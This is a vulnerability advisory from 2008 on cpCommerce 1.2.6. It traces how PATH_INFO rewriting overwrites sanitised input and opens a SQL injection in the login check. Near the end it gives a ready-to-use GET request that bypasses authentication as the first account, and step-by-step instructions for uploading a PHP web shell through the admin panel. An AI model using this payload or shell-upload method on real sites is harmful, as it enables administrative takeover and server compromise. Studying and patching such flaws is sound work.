cpCommerce version 1.2.6 suffers from input variable overwrite and authentication bypass vulnerabilities.
36ccf2083eb59ff2456b8249c9f6a5d77b25f56bf423dad44544b41fb693b79b
Author: girex
Homepage: girex.altervista.org
CMS: cpCommerce 1.2.6
Site: http://cpcommerce.cpradio.org/
Bug: URL Rewrite -> Input variables overwrite
PoC: Auth bypass -> Shell upload
Note: Works regardless php.ini settings
Vendor informed: 23/11/08
cpCommerce 1.2.7 released: 30/11/08
Public advisory: 30/11/08
-------------------------------------------------------------------------------------------------
CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.
-------------------------------------------------------------------------------------------------
Vulnerability discussion:
cpCommerce sets register_globals to Off with ini_set
and stores all GET and POST variables into $input array after have addslashed them.
lines: 16-32
file: /functions/sanitize_value.func.php
function SanitizeInput()
{
$input = array();
if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
{
foreach ($_GET as $key => $val)
{
if (is_array($val))
{
$input[$key] = SanitizeArray($val);
}
else
{
$input[$key] = SanitizeValue($val);
}
}
}
... and does the same for POST vars
lines: 3-13
function SanitizeValue($value)
{
if (!get_magic_quotes_gpc())
{
return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
}
else
{
return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
}
}
-------------------------------------------------------------------------------------------------
Let we see _funcions.php (the mainfile)
lines: 128-132
file: _functions.php
$input = array();
if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
{
$input = SanitizeInput();
}
So, all GET and POST vars ar sanitized and stored into $input array.
Let we procede in _functions.php...
-------------------------------------------------------------------------------------------------
lines 156-173
file: _functions.php
if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
{
$rewriteValues = array();
if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
{
$rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
}
else
{
$rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
}
for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
{
$input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
}
}
$_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page
For example: GET http://localhost/index.php/helloword
/index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword
As you can see from previous snipplet of code we can set $input content with
GET index.php/key/value/
So we can overwrite all inputs data in this cms, bypassing SanitazeInput()
and the effect of magic_quotes
How we'll exploit that....
-------------------------------------------------------------------------------------------------
lines: 13-20
code: /actions/login.act.php
if (checkSession($input['email'], md5($input['password']))) {
$_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
$return['url'] = urldecode("{$input['returnurl']}");
} else {
$_SESSION['loginerror'] = TRUE;
$return['url'] = urldecode("{$input['returnurl']}");
}
If checkSession returns true we are logged in...
lines: 3-9
code: /functions/account_info.func.php
function checkSession($email,$pass) {
global $config, $db_chooser;
$sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
"email='$email' and pass='$pass'";
$accounts = $db_chooser->sql_query($sql['accounts']);
We can manipulate this query having a SQL Injection with an auth bypass
logging in with admin priviledges...
-------------------------------------------------------------------------------------------------
If we set $input['email'] to: ' OR id_account=1# with the trick of PATH_INFO (index.php/email/value)
the resulting query will be: select `id_account`, `level` from cpAccounts where email='' OR id_account=1
-------------------------------------------------------------------------------------------------
PoC Auth Bypass:
GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php
-------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
If you want to upload a shell:
- Log in with the auth bypass PoC
- Go to /[path]/admin/
- Go to General Info -> Configuration
- Add ,php in What Image Extensions do you want to accept on Uploads?
- Go to Product -> Create
- Select a right category
- Fill required fields
- Upload your shell.php in Product Thumbnail Image
- Save all
Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php
-------------------------------------------------------------------------------------------------